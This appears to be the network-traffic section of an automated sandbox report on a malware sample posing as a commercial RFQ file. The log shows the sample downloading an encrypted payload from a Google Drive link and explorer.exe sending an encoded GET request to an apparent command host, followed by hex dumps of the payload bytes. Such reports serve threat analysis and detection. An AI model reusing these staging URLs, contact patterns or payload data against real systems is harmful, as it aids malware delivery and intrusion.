                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                9192.168.11.204993976.223.26.9680C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:33:28.092219114 CEST349OUTGET /fg83/?IpZXsVy=+mA0FlUcSz8uL7OKJNWfW2ZlgbXAiWHV5u0VTdt0L7UZP0MWfugFcx8oc6pDvqcBHwu4&kxopsN=MlyXbd0X HTTP/1.1
                                                                                                                                                                                Host: www.shebyoaksmovie.com
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:33:28.128123045 CEST350INHTTP/1.1 403 Forbidden
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:33:28 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                0192.168.11.2049921142.250.185.110443C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2023-08-23 07:28:58 UTC0OUTGET /uc?export=download&id=1ZxodEIl11x1kvePl-a7TaaxTL5A6DR79 HTTP/1.1
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                Host: drive.google.com
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                2023-08-23 07:28:58 UTC0INHTTP/1.1 303 See Other
                                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:28:58 GMT
                                                                                                                                                                                Location: https://doc-14-bk-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/si1abd4ulvss7tcohtsfs7v3penv9eff/1692775725000/09097082265029608041/*/1ZxodEIl11x1kvePl-a7TaaxTL5A6DR79?e=download&uuid=29b6be65-76dc-43bd-aef7-44538726e87d
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                Content-Security-Policy: script-src 'nonce-ftCTCDP3LTW59gaKdH9xOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                Server: ESF
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                1192.168.11.2049922172.217.18.97443C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2023-08-23 07:28:58 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/si1abd4ulvss7tcohtsfs7v3penv9eff/1692775725000/09097082265029608041/*/1ZxodEIl11x1kvePl-a7TaaxTL5A6DR79?e=download&uuid=29b6be65-76dc-43bd-aef7-44538726e87d HTTP/1.1
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Host: doc-14-bk-docs.googleusercontent.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2023-08-23 07:28:58 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                                X-GUploader-UploadID: ADPycdvoR0uums0mihdHa5jUGmTuhMj5vsbUJ-WcXFHLvqm0stj1ZE-omtcFryeECEUK27GsDpLm3wOXX8XX0wJ4wmzyAg
                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                Content-Disposition: attachment; filename="oQSIKK239.bin"; filename*=UTF-8''oQSIKK239.bin
                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                                                                                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Length: 189504
                                                                                                                                                                                Last-Modified: Wed, 23 Aug 2023 00:14:35 GMT
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:28:58 GMT
                                                                                                                                                                                Expires: Wed, 23 Aug 2023 07:28:58 GMT
                                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                                X-Goog-Hash: crc32c=5XJvcA==
                                                                                                                                                                                Server: UploadServer
                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                Connection: close
                                                                                                                                                                                2023-08-23 07:28:58 UTC6INData Raw: a1 c0 03 1b 32 5d 23 b6 e7 30 30 76 ce f8 c7 e6 98 97 2f ee 0e 21 ec a0 db c8 26 66 82 d5 46 9c f0 b5 cf b1 87 d6 6e fd cd 8b 58 27 f5 11 08 98 54 8a 55 83 f8 b5 54 54 bf ab 5d 1e 73 88 d0 d9 43 e6 3c 07 c2 5b 99 8d 05 2b f2 5c ae 91 3e 0a 99 e4 d1 26 36 0f f6 0d b8 cf f1 43 76 4b 63 c1 a2 df 87 14 c1 74 0a 52 03 3f fa aa c9 bd 40 e9 b1 3e a7 5e a1 0e 98 e0 93 2c 3b d7 a3 5e ae 7e e7 7a 44 36 9a 31 92 e8 bf e9 70 23 ab f8 05 12 48 90 47 5f 83 dc df 13 7b 4d 02 70 e2 9c 7e 2c 92 d9 d2 8c 3b ab dd 16 9b 13 1f b5 5b 90 e5 03 65 09 06 4f 07 b2 4c e0 0d 6c 3e a7 92 04 a5 5a 66 7a a6 f0 a0 f0 12 00 95 a5 7c e9 85 92 c9 60 ea b4 05 4c 2a 0d c5 9b 14 6b d1 09 76 41 85 87 c9 71 2a 9e d9 96 62 d6 87 56 5f 51 fb 20 7f 46 a8 8e 8f f6 da f0 03 67 a9 ed 90 62 e9 42 cb
                                                                                                                                                                                Data Ascii: 2]#00v/!&fFnX'TUTT]sC<[+\>&6CvKctR?@>^,;^~zD61p#HG_{Mp~,;[eOLl>Zfz|`L*kvAq*bV_Q FgbB
                                                                                                                                                                                2023-08-23 07:28:58 UTC10INData Raw: 97 56 41 27 f5 06 89 9f 4f 79 e2 af 74 68 9d 44 70 2d 16 09 7f 99 a4 d8 25 7c a0 2a 67 2f f1 33 b7 d7 6a 25 a9 ca 42 19 08 cb be f1 3b 30 93 91 a3 b9 50 6a f9 cd 16 54 6f 2c be 2e 66 eb c8 b7 4a 24 26 da 4e a1 13 e5 5a a5 cd 86 6f fb 47 ec 92 46 85 c7 1a 5f dc dd a4 17 cf 5e 09 14 84 9b 69 a8 b0 68 e8 5b 92 54 bb 34 cb b3 d0 53 31 8a cd 6f d5 3f bc 36 a2 cd 1b 74 71 4f 64 ee 52 a8 07 ec 70 2c 7b 72 61 0a cc e0 0b 57 63 f6 18 ff fc 94 f3 d1 ee be 09 f6 d7 d9 67 89 1a b0 f2 ce d9 fa 67 56 1b b7 4d c6 a3 eb ea 6b 97 55 28 3d d0 33 f0 6b 43 4d b9 c9 38 97 92 e4 62 47 92 8b 84 7c 18 3a c5 b7 06 bd d0 e9 ca 49 6e f2 fb 3b 70 3d b6 93 68 8f 98 5c c5 ed 8b 1b 96 5b 27 a1 2a e3 55 a1 65 da 4f c3 78 b1 0e 79 21 06 d5 74 d2 2f ac 38 c1 ed 23 40 d3 ab 76 3b 8b 74 ac
                                                                                                                                                                                Data Ascii: VA'OythDp-%|*g/3j%B;0PjTo,.fJ$&NZoGF_^ih[T4S1o?6tqOdRp,{raWcggVMkU(=3kCM8bG|:In;p=h\['*UeOxy!t/8#@v;t
                                                                                                                                                                                2023-08-23 07:28:58 UTC14INData Raw: e4 f1 98 38 2d c6 78 09 25 53 94 21 24 2a 15 2e 1e bd 34 ae aa 81 83 e8 92 19 43 6a cd d7 b9 3a c4 3e e4 bd 9f c0 37 a4 8f a3 33 c2 e2 df 06 89 54 3d d2 48 94 4d 15 02 15 49 fe 28 43 21 5e 9a b7 78 0e 82 7d 41 b1 f8 87 a7 09 93 3e 04 d0 6c 79 41 d0 28 c7 71 9b 85 4c 11 42 1e 12 a1 bb 91 3a 94 64 9d 8b 2a 0b f3 f7 5a 31 9f 46 db df d8 b3 02 74 83 fd 0f 98 76 25 bc 2a 63 28 cb 67 16 55 6e 1d 78 ae f4 85 41 57 7c 9d 33 3e fa 8a 7e 80 98 31 21 91 50 08 d2 60 c0 5d 1b ee 16 7b e0 e2 d1 cc 2d ce be 27 02 c1 63 54 d6 ee 1e 77 8e 6b c4 e1 99 04 12 07 ee 42 d1 64 47 8d e8 a9 51 08 eb 1e c2 64 10 68 14 77 c3 74 94 23 f1 db 97 18 cf 0e e6 c7 97 36 5c 9a ab e4 3b 1a 93 d6 b3 2d 34 e8 59 3c 90 2c 75 7b 1f da f5 84 f1 91 15 4b d8 2f 15 9b 3d ec f1 6d 8e c2 f4 dc 61 68
                                                                                                                                                                                Data Ascii: 8-x%S!$*.4Cj:>73T=HMI(C!^x}A>lyA(qLB:d*Z1Ftv%*c(gUnxAW|3>~1!P`]{-'cTwkBdGQdhwt#6\;-4Y<,u{K/=mah
                                                                                                                                                                                2023-08-23 07:28:58 UTC18INData Raw: 68 8f 3f 37 31 ec f0 e0 0d e6 61 0e 76 54 d6 a3 db a2 f0 9c d5 93 a6 8a 0c db bc c3 dc d5 18 06 7d 7d ad f4 4e d2 86 73 f7 36 fb 24 41 d1 4f 98 64 33 0d e7 84 72 f7 23 7f bc 66 c1 fd 32 aa 5d d1 c2 05 7a 34 8d 2a cd 9e 30 cb 42 91 b7 dd 7a 09 cb 3f 6f 8f bb 32 21 a4 52 72 56 e1 2b e3 dc 20 c8 33 0b c3 29 f9 7a 65 06 5f 26 48 c4 d6 ce 5f 88 e6 b8 33 21 c6 19 97 98 08 7b f7 b0 59 37 1b ca 4b c4 fd 3f 05 f8 7f 55 c5 fd 87 88 3a 1e 2d b5 a9 72 1a 1c c8 ce a8 f9 88 fb 81 dd b8 85 52 9a ef 97 57 a4 c9 1a 9c 67 90 3c e9 06 50 3d b7 50 db ff 4e 69 d5 fa 7e 65 3f 4b 47 62 1f c8 67 39 78 da f3 35 d8 5f 51 f8 5a f8 95 64 51 94 d2 e1 95 da ef 9a a1 a8 fe f5 67 17 13 e5 d8 d5 0a 3c 3b 09 02 74 ac ac ff 5a f9 b0 6b d3 7e 8b 22 37 7f 38 4c 42 1c f6 57 cd a0 a8 1c 42 77
                                                                                                                                                                                Data Ascii: h?71avT}}Ns6$AOd3r#f2]z4*0Bz?o2!RrV+ 3)ze_&H_3!{Y7K?U:-rRWg<P=PNi~e?KGbg9x5_QZdQg<;tZk~"78LBWBw
                                                                                                                                                                                2023-08-23 07:28:58 UTC19INData Raw: 73 0e 6e 1a 91 03 90 13 d8 9d 28 d8 19 e7 92 b4 d9 b6 2c f5 7c bb c9 f5 3c 3b 06 3f 7c a2 ad 4d 76 8d 67 ea 31 b2 df 92 33 7f 9b e9 17 8d d5 a9 3a 21 4e d0 88 44 57 5f 62 1a 57 53 13 b8 31 91 a1 5a 87 8f df de 93 e6 54 c2 0c a3 5d 3d b3 2f 91 62 1e 6e fc 5d 86 90 3c 23 4d e2 29 90 fc 23 e0 07 3e ef 4c ec 85 ad ca 77 63 66 dc 1c 93 d6 dd 66 84 64 27 4d c7 d9 1c d3 c0 ee b4 7c 20 ab f4 58 1d fa a5 08 07 0d 4f de ac 83 a8 d9 60 c1 e3 6f 98 45 b3 4a e6 8a 9b 17 b7 e5 29 5a c7 db 46 54 7b a1 15 10 13 d6 55 06 48 f9 80 cc 39 01 a6 6e f7 27 03 dc c0 9f e2 7d ad 76 a7 9a 99 9f c8 83 98 7f cd e5 55 95 e0 90 f9 42 ec 83 1c 71 f0 f6 16 c6 1f fe 73 0a f6 07 b6 24 ae f9 aa 26 57 c8 f5 87 81 43 54 ff ab 54 d1 1a 72 ec d8 f7 bb 7f 30 5e 22 cb 9e 7c 5a 41 c0 ae 33 a3 d1
                                                                                                                                                                                Data Ascii: sn(,|<;?|Mvg13:!NDW_bWS1ZT]=/bn]<#M)#>Lwcffd'M| XO`oEJ)ZFT{UH9n'}vUBqs$&WCTTr0^"|ZA3
                                                                                                                                                                                2023-08-23 07:28:58 UTC20INData Raw: ed 09 02 e8 93 dd 89 0f f9 91 86 97 82 cb 58 60 47 db ed ea 46 41 fe dc b5 73 3e eb f9 e4 95 ab 8f 6a e7 de 1f 2f cf a8 67 fe 8f 95 41 6c 64 33 fa b9 af 33 c9 e4 80 0e 7f e4 90 81 c6 a8 6d 0f 94 16 a7 f1 60 98 4f d0 65 39 44 ed e0 41 a9 d9 cb 9f fb c9 fd 06 13 e1 89 b4 59 a6 b4 ce a7 30 e0 1b 57 2b 97 6b e5 3d f2 ad 11 8b 63 10 b2 9b b3 48 9a 79 ba b0 88 49 d0 d2 b8 db 64 e9 a8 28 f5 7e b6 73 44 cf 6b 39 a5 33 ea 45 7c 47 3a fc d5 2f 4f 24 37 ec f1 b9 da a8 10 7a 98 02 6f 8b eb c7 b6 5d 7c 53 22 ec 8a 01 55 82 51 49 3f cc da b4 9a 1b 0d 20 8a ae 74 12 99 83 9b 50 02 64 01 1e 29 fb 17 fb 14 db fe 91 17 92 96 ae bc ff 4d da f7 26 e9 ad 78 15 86 bc f8 eb 18 e8 2e 86 a9 a4 4a 08 94 82 d3 be 25 61 43 8e 92 de 13 e7 b6 3f e3 b3 3f 86 1a b1 5c ea b5 c1 27 16 dd
                                                                                                                                                                                Data Ascii: X`GFAs>j/gAld33m`Oe9DAY0W+k=cHyId(~sDk93E|G:/O$7zo]|S"UQI? tPd)M&x.J%aC??\'
                                                                                                                                                                                2023-08-23 07:28:58 UTC21INData Raw: e3 61 fb d3 9a 5e c5 4d 6f 8b cb e7 81 9c 73 0f 72 47 66 52 66 0e a6 a9 4c 2e 51 19 06 41 45 49 e4 83 ab 1d c4 b1 e7 d4 5a 2b 3e aa a6 0b 0b 26 b8 e7 a2 45 ad d7 ee dd 40 e9 fe bc 5e 2e f5 82 c3 b3 bf d7 bb 90 68 71 de 57 fa 07 92 5e b3 33 4c fe b7 06 f0 42 de 7b 1d c7 f4 da 92 a5 0d cf 8f 51 ae 32 cf e8 f7 67 b4 0e fa 09 7a d8 f1 f5 4b 91 97 16 94 08 10 27 31 c1 1c 3a 75 41 2e 21 fb 5f da aa 48 93 fc d3 c7 08 56 43 b5 63 81 de ae 7e 3f b6 68 17 bd 0a db 38 94 23 71 35 2e 2e 01 74 22 80 a0 b8 08 15 36 89 42 e1 a6 da dd 60 55 b6 6b e6 e1 e8 d2 90 ae 33 50 55 e4 03 f0 2e a4 6e d4 3c 88 f3 ce 7f 1e 74 f5 19 18 38 a2 2e 0e d9 24 23 1c 68 60 f9 5d 59 71 ba b0 03 fa 42 67 ae 63 23 29 6a 9e 9e 50 ca 5f 1a 43 3a c4 95 5f 76 8a 4d 93 6f af 99 4a 80 8b 8f 4b 58 4a
                                                                                                                                                                                Data Ascii: a^MosrGfRfL.QAEIZ+>&E@^.hqW^3LB{Q2gzK'1:uA.!_HVCc~?h8#q5..t"6B`Uk3PU.n<t8.$#h`]YqBgc#)jP_C:_vMoJKXJ
                                                                                                                                                                                2023-08-23 07:28:58 UTC22INData Raw: 77 7f 1b 09 b5 f7 8a 5c 8a cc 9e b1 55 61 93 b6 10 f0 21 c9 94 14 28 67 75 32 c2 c5 4a e6 f6 eb 44 1b 6f cd 95 90 65 7f 0d 2b 59 75 2a 5b f3 8b 57 20 27 5c 87 38 f7 89 da 1c 4e 7d 6a 90 28 0e 73 60 88 89 f4 81 41 f4 f7 54 6b 9f 84 7c 5c d9 b3 e7 fd aa c9 38 b6 9d 82 c1 21 46 81 0e 98 63 2d 2c 1b d7 63 5e da 5a 6a db fa 18 9a 85 9b 50 85 d2 cf 7f 46 d9 51 7a 54 d3 ec a9 fd 93 b8 61 99 d8 20 6e 8f b2 99 c5 ea d9 b0 e9 28 19 f6 25 78 bd f7 99 3f df b6 23 08 66 62 ed af bb 61 ea 29 6d 3e a7 92 37 65 04 90 45 25 94 6b 4d 74 b9 2b 68 f2 21 9f f0 50 5a da bc 41 73 97 b0 a3 22 27 ed 25 90 9a dc e3 3e 3d 71 16 a1 27 2b 04 6f d5 3f 3c 39 ac bc 19 ff a8 d0 d2 35 b3 87 82 53 f1 c5 a1 7b ee 79 13 aa 06 d9 04 ae fb 45 b6 95 32 63 6d e8 cb ae e4 32 67 bb 1a 30 13 31 ad
                                                                                                                                                                                Data Ascii: w\Ua!(gu2JDoe+Yu*[W '\8N}j(s`ATk|\8!Fc-,c^ZjPFQzTa n(%x?#fba)m>7eE%kMt+h!PZAs"'%>=q'+o?<95S{yE2cm2g01
                                                                                                                                                                                2023-08-23 07:28:58 UTC24INData Raw: 70 d1 70 df 47 7e 6e d5 3c fc ba d0 ad 24 03 ab 8e 8f 81 e5 a0 8e f2 09 16 6f 9d be 10 23 2a 24 53 e8 ac d3 45 39 c0 d2 bd 63 15 3c 06 9e 50 7c 3b c8 31 41 b8 7b e5 a0 c2 15 75 ab d6 a8 ac 6e 62 19 03 0e d0 88 bf ea fa 96 af bb 45 0f f4 df 96 cd 90 0d 3f d7 7c 2c a6 ec eb 15 94 12 2d 01 58 1a 43 4f 6d a0 12 d8 8a 16 ab 46 1e 93 52 c5 43 8e 34 72 7d f5 9f d1 46 08 0e 0a 92 a6 a7 87 be 7b 5f d5 4f 2e 2d d0 47 78 af ad 04 23 a3 f3 27 89 78 5c b8 a5 9b 47 1c 9e 79 5b 93 23 83 ad df f9 47 d5 07 d8 ea 13 2e 02 83 44 59 3c eb 4b 36 d0 ae b3 9b e4 fc 27 d9 a1 ea e9 b3 1f 2d bd 18 7e a0 82 b9 aa 3e 06 fb e3 8e 18 4e 16 f2 b7 ef 97 96 46 52 07 27 ad 69 2c e3 e4 68 78 6f 48 50 b3 c0 e4 29 c7 f7 18 24 3d 09 48 1d 62 4e 4a 0d b7 9a c6 48 d2 04 83 5c e3 d4 3d e3 1d 9f
                                                                                                                                                                                Data Ascii: ppG~n<$o#*$SE9c<P|;1A{unbE?|,-XCOmFRC4r}F{_O.-Gx#'x\Gy[#G.DY<K6'-~>NFR'i,hxoHP)$=HbNJH\=
                                                                                                                                                                                2023-08-23 07:28:58 UTC25INData Raw: e2 8e 6b af e6 46 93 e0 13 5b 47 d9 91 00 f0 3e 1f a8 8f 51 3d b7 50 00 3e 4d f7 aa e4 81 34 a6 3d f1 30 6a e0 59 2b a5 29 10 ca 53 2a 59 f8 88 b6 96 e5 b3 a7 00 4c 52 5e f2 ce 92 62 75 e5 e3 1d 25 64 5f 2a cd 79 cf 7e b4 45 3a cf 45 c5 8a a0 6a ad e9 8b 22 36 f4 6c da 81 1d 00 77 32 a0 aa 2f 88 44 3d d0 9b 2f cb 6c 22 57 a0 0c 41 04 10 04 82 44 12 88 e6 3e 5d 2e 43 f9 d5 d4 af f3 fe 06 79 d7 db 06 f5 b2 50 8b 58 37 fc 23 ef 82 8a f4 8c 57 88 d0 74 9e 89 10 5e b5 ba e6 b9 e6 63 16 b3 08 5f ac 9f 94 47 eb 4b 26 09 5b 7d d8 fe 6f a5 85 42 76 43 cb 25 da 9d 36 ac 6b 80 2f 12 c5 50 df e6 e0 9a 11 55 55 27 9b 04 84 23 47 ec 02 f9 d1 82 ce be f0 e0 af 0b 14 e2 72 c0 6a c4 08 90 ad 55 5c 91 ff ae 34 9c aa 9d b8 42 99 1d a4 32 b3 be c7 83 88 78 82 13 10 59 9e 50
                                                                                                                                                                                Data Ascii: kF[G>Q=P>M4=0jY+)S*YLR^bu%d_*y~E:Ej"6lw2/D=/l"WAD>].CyPX7#Wt^c_GK&[}oBvC%6k/PUU'#GrjU\4B2xYP
                                                                                                                                                                                2023-08-23 07:28:58 UTC26INData Raw: 7c 2d 10 82 8b 7e af f0 7f 3d d9 6d 0e a0 c0 d1 7a b8 cc 7e 62 6e 82 b5 2e 1a 55 36 e5 31 0b 51 b7 5b 52 48 29 ba 16 f0 84 b9 46 bf 79 00 80 08 83 90 57 8d fc 0f 7b 53 2a c4 0f 46 66 cc 33 59 b4 89 47 e8 f8 dc df 19 8b 33 6c 06 72 2e b7 56 5d 89 7d f7 5b f9 a1 bb ae 57 62 9a 9b 24 f7 69 46 64 56 1d f2 d6 de 81 67 7e 68 a6 fc 83 f5 3e 23 f2 84 c5 0f f9 18 bd 15 fe ba 69 42 12 53 cc ad 04 ca 40 df 68 d4 b3 5b a6 87 26 5c 7e bc 63 7c 6e 63 50 0c aa 58 7d 10 8b 34 10 43 9b 18 c4 aa 4d c6 89 16 1c 09 95 fa e0 32 1e 00 77 71 e2 bd 6d 32 a1 5c e7 4a d1 99 a1 57 0b 5f b5 d1 88 42 0e 65 61 6d 0a 5a d8 99 e4 75 54 97 0e 09 97 22 9e 4f 6a 7d 7b fc 09 92 7e 7a 42 02 8a 08 f6 9a 6e 69 56 da fa 66 12 99 89 18 48 5c bc 56 d5 72 70 a5 f0 5e cf 95 a6 26 9d fc 02 b2 ff 4d
                                                                                                                                                                                Data Ascii: |-~=mz~bn.U61Q[RH)FyW{S*Ff3YG3lr.V]}[Wb$iFdVg~h>#iBS@h[&\~c|ncPX}4CM2wqm2\JW_BeamZuT"Oj}{~zBniVfH\Vrp^&M
